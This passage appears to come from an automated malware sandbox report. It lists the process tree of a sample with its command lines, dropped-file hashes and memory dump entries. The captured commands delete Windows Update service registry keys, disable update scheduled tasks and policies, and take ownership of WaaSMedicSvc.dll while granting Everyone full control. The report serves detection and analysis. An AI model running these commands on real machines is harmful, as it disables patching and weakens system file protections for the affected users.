- [level 4] C:\Windows\system32\sc.exe
  Command: sc stop dosvc
  - Launches sc.exe
  PID: 4032
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
  PID: 4168
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
  PID: 3776
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies registry key
  PID: 3972
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
  PID: 2056
- [level 4] C:\Windows\system32\reg.exe
  Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
  PID: 660
- [level 4] C:\Windows\system32\takeown.exe
  Command: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID: 2344
- [level 4] C:\Windows\system32\icacls.exe
  Command: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID: 3412
- [level 4] C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
  - Modifies registry key
  PID: 5052
- [level 4] C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
  - Modifies registry key
  PID: 3740
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
  PID: 4992
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
  PID: 3884
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
  PID: 3488
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
  PID: 1672
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
  PID: 2720
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
  PID: 4716
- [level 4] C:\Windows\system32\schtasks.exe
  Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
  PID: 1496
- [level 4] C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
  - Modifies registry key
  PID: 3820
- [level 4] C:\Windows\system32\reg.exe
  Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
  - Modifies registry key
  PID: 3156
- [level 3] C:\Windows\System32\conhost.exe
  Command: C:\Windows\System32\conhost.exe
  PID: 984
- [level 4] C:\Windows\System32\conhost.exe
  Command: "C:\Windows\System32\conhost.exe" "szbaropxxftnd"
  PID: 468
- [level 3] C:\Windows\System32\svchost.exe
  Command: C:\Windows\System32\svchost.exe nobuxigwk1 … (remainder of the command line not captured in the report)
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 672
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\Program Files\Windows\services.exe
- Filesize: 4.3MB
- MD5: ccaffcd12dcb30adb5250f30026ecd1e
- SHA1: 4048dc71db497f641a4f35eb00ac3c163c394978
- SHA256: fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
- SHA512: a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wmo52yxe.xd4.ps1
- Filesize: 60B
- MD5: d17fe0a3f47be24a6453e9ef58c94641
- SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
- SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
- SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
- Filesize: 539B
- MD5: b245679121623b152bea5562c173ba11
- SHA1: 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
- SHA256: 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
- SHA512: 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
memory/468-214-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-211-0x0000017916E40000-0x0000017916E47000-memory.dmpFilesize
28KB
-
memory/468-215-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-218-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-217-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-216-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/672-203-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-204-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-200-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-219-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-202-0x000001A6B0B60000-0x000001A6B0B80000-memory.dmpFilesize
128KB
-
memory/672-197-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-201-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-220-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-208-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-209-0x000001A6B15A0000-0x000001A6B15E0000-memory.dmpFilesize
256KB
-
memory/672-210-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-207-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-206-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-205-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/984-192-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/984-195-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/984-212-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/1092-135-0x00000262312C0000-0x00000262312D0000-memory.dmpFilesize
64KB
-
memory/1092-134-0x00000262312C0000-0x00000262312D0000-memory.dmpFilesize
64KB
-
memory/1092-133-0x000002622EEB0000-0x000002622F2CC000-memory.dmpFilesize
4.1MB
-
memory/1092-136-0x00000262312C0000-0x00000262312D0000-memory.dmpFilesize
64KB
-
memory/2408-169-0x000001976B220000-0x000001976B230000-memory.dmpFilesize
64KB
-
memory/2408-196-0x000001976BB90000-0x000001976BBA2000-memory.dmpFilesize
72KB
-
memory/2408-167-0x000001976B220000-0x000001976B230000-memory.dmpFilesize
64KB
-
memory/2408-168-0x000001976B220000-0x000001976B230000-memory.dmpFilesize
64KB
-
memory/2952-186-0x00000218DF690000-0x00000218DF6AA000-memory.dmpFilesize
104KB
-
memory/2952-171-0x00000218DDA70000-0x00000218DDA80000-memory.dmpFilesize
64KB
-
memory/2952-185-0x00000218DF220000-0x00000218DF22A000-memory.dmpFilesize
40KB
-
memory/2952-184-0x00007FF3FF1D0000-0x00007FF3FF1E0000-memory.dmpFilesize
64KB
-
memory/2952-183-0x00000218DF670000-0x00000218DF68C000-memory.dmpFilesize
112KB
-
memory/2952-182-0x00000218DF210000-0x00000218DF21A000-memory.dmpFilesize
40KB
-
memory/2952-181-0x00000218DF430000-0x00000218DF44C000-memory.dmpFilesize
112KB
-
memory/2952-187-0x00000218DF650000-0x00000218DF658000-memory.dmpFilesize
32KB
-
memory/2952-170-0x00000218DDA70000-0x00000218DDA80000-memory.dmpFilesize
64KB
-
memory/2952-188-0x00000218DF660000-0x00000218DF666000-memory.dmpFilesize
24KB
-
memory/2952-189-0x00000218DF6B0000-0x00000218DF6BA000-memory.dmpFilesize
40KB
-
memory/3164-149-0x000002AFF3FD0000-0x000002AFF3FE0000-memory.dmpFilesize
64KB
-
memory/3164-148-0x000002AFF3FD0000-0x000002AFF3FE0000-memory.dmpFilesize
64KB
-
memory/3164-147-0x000002AFF3FD0000-0x000002AFF3FE0000-memory.dmpFilesize
64KB
-
memory/3164-137-0x000002AFF3FA0000-0x000002AFF3FC2000-memory.dmpFilesize
136KB